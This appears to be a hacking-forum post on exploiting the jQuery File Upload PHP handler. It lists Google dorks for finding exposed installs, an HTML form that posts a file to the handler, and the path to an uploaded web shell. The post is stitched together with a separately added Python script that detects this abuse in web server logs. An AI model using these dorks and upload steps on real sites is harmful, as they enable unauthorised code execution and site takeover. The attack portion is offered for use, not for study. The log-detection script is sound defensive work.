Straight to the point, no chit-chat and no venting.
Dork:
Inurl:/assets/global/plugins/jquery-file-upload/
Inurl:/jquery-file-upload/server/php/ intext:{"files":[]}
Inurl:/assets/global/plugins/jquery-file-upload/ intext:index of
Work out the rest yourself, so you don't get spoiled :)
Exploits:
http://www.target.com/assets/global/plugins/jquery-file-upload/server/php/
If it is vulnerable, it will look like the following
Next
Save the code below as an .html file, with the Save as type set to "All Files"
<form method="POST" action="http://www.target.com/assets/global/plugins/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Don't forget to replace http://www.target.com with your target.
Once that is done, open the file and upload your shell.
Access your shell at http://www.target.com/assets/global/plugins/jquery-file-upload/server/php/files/shell.php
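For site owners, the steps above leave a recognisable trail in the web server access log: a POST to the plugin's server/php/ handler, then a request for a script under server/php/files/. The following Python check is an added example, not part of the original post; it flags that pattern in common/combined-format logs. The function name, the extension list and the sample log lines are assumptions constructed for illustration.

```python
import re

# Combined/common log format: ip - - [time] "METHOD path PROTO" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')
# The bundled PHP upload handler path, as given in the post.
HANDLER = re.compile(r'/jquery-file-upload/server/php/(?:index\.php)?(?:\?.*)?$', re.I)
# A script fetched from the handler's files/ directory. The extension list is
# an assumption; extend it to match what your server executes.
SCRIPT = re.compile(
    r'/jquery-file-upload/server/php/files/[^?]*\.(?:php\d?|phtml|phar)(?:\?|$)', re.I)

def find_upload_abuse(lines):
    """Return (client_ip, kind, path) tuples for suspicious requests."""
    uploaders = set()            # clients that successfully POSTed to the handler
    findings = []
    for raw in lines:
        m = LINE.match(raw)
        if not m:
            continue             # not in the expected log format
        ip, method, path, status = m[1], m[2].upper(), m[3], int(m[4])
        if status >= 400:
            continue             # request was rejected or the file was not served
        if method == "POST" and HANDLER.search(path):
            uploaders.add(ip)
            findings.append((ip, "upload-post", path))
        elif SCRIPT.search(path):
            kind = "script-after-upload" if ip in uploaders else "script-in-upload-dir"
            findings.append((ip, kind, path))
    return findings

BASE = "/assets/global/plugins/jquery-file-upload/server/php/"
# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    f'198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET {BASE} HTTP/1.1" 200 12',
    f'198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "POST {BASE} HTTP/1.1" 200 310',
    f'198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET {BASE}files/a.php HTTP/1.1" 200 5',
    f'203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET {BASE}files/photo.jpg HTTP/1.1" 200 900',
    f'203.0.113.9 - - [01/Jan/2024:10:01:02 +0000] "GET {BASE}files/old.phtml HTTP/1.1" 200 40',
    f'192.0.2.4 - - [01/Jan/2024:10:02:00 +0000] "POST {BASE} HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(finding)
```

A "script-in-upload-dir" hit with no matching POST still deserves a look, since the upload may predate the log window or have come from another address.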
That's all, and thanks for the paycheck :v